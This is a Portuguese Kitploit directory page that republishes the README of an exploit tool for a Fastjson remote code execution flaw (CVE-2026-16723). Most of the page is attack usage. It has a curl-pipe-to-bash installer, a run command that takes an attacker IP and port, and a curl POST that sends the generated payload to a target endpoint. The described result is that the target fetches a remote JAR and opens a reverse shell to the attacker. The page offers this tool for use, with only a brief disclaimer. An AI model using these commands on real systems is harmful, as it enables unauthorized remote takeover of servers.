Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-16723 — Exploit para RCE no Fastjson (CVE-2026-16723) visando as versões 1.2.68 a 1.2.83. Gera payloads JAR e JSON, hospeda servidor HTTP e estabelece reverse shell. | Kitploit
Ferramentas/GitHubGitHub/nowafen/cve-2026-16723
Geração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubnowafen/cve-2026-16723

CVE-2026-16723

Exploit para RCE no Fastjson (CVE-2026-16723) visando as versões 1.2.68 a 1.2.83. Gera payloads JAR e JSON, hospeda servidor HTTP e estabelece reverse shell.

Ver Repositório
2há 3 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-16723 Exploit

Uma implementação autônoma em C++17 para CVE-2026-16723, uma vulnerabilidade crítica que afeta as versões 1.2.68 – 1.2.83 do Fastjson.

Requisitos

  • Linux (ou WSL no Windows)

  • Compilador compatível com C++17 (GCC 7+ ou Clang 5+)

  • CMake 3.10 ou mais recente

  • Pacotes do sistema:

    • libzip-dev
    • zlib1g-dev

Debian / Ubuntu

root@kitploit:~
sudo apt update
sudo apt install -y build-essential cmake libzip-dev zlib1g-dev

Instalação

Instalação Rápida (Recomendada)

Instale tudo com um único comando:

root@kitploit:~
curl -sSL https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh | bash

Ou baixe e execute o instalador manualmente:

root@kitploit:~
wget https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh
chmod +x install.sh
./install.sh

O script de instalação irá:

  • Instalar todos os pacotes de sistema necessários.

  • Baixar as bibliotecas somente de cabeçalho necessárias:

    • nlohmann/json
    • cpp-httplib
  • Compilar o projeto.

  • Colocar o binário compilado no diretório atual como:

root@kitploit:~
./exploit

Compilação Manual

Se você clonou o repositório:

root@kitploit:~
git clone https://github.com/yourusername/CVE-2026-16723.git
cd CVE-2026-16723
./install.sh

Ou compile manualmente:

root@kitploit:~
mkdir build
cd build

cmake ..
make -j$(nproc)

cp exploit ../

Uso

Execute o binário:

root@kitploit:~
./exploit --lhost <YOUR_IP> --lport <SHELL_PORT> [options]

Exemplo

root@kitploit:~
./exploit --lhost 192.168.1.100 --lport 4444 --http-port 8000

Após a execução, os seguintes arquivos serão criados:

root@kitploit:~
x
body.json

O servidor HTTP iniciará na porta configurada (padrão: 8000) e a ferramenta aguardará uma conexão de reverse shell de entrada.


Enviando o Payload

Envie o arquivo body.json gerado para o endpoint vulnerável:

root@kitploit:~
curl -X POST http://<TARGET_IP>:8080/api/products/search \
     -H "Content-Type: application/json" \
     --data-binary @body.json

Se a aplicação esperar um campo JSON diferente, especifique-o usando a opção --field.


Opções de Linha de Comando


Arquivos de Saída

ArquivoDescrição
xPayload JAR gerado
body.jsonPayload JSON para enviar ao alvo

Notas

  • Este projeto destina-se somente a testes de segurança autorizados e fins educacionais.
  • A implementação força a aplicação alvo a baixar e carregar um JAR remoto usando os protocolos jar:http e jar:file.
  • O comando do reverse shell é codificado em Base64 para reduzir problemas de escape.

Siga-me no Twitter (X)

  • MNM
Baixar ferramenta
OpçãoDescriçãoPadrão
--lhostEndereço IP localObrigatório
--lportPorta de escuta do reverse shell4444
--http-portPorta do servidor HTTP8000
--firstPrimeiro descritor de arquivo a tentar3
--lastÚltimo descritor de arquivo a tentar30
--fieldNome do campo JSONfacets
--outdirDiretório de saída.
-h, --helpExibir mensagem de ajuda—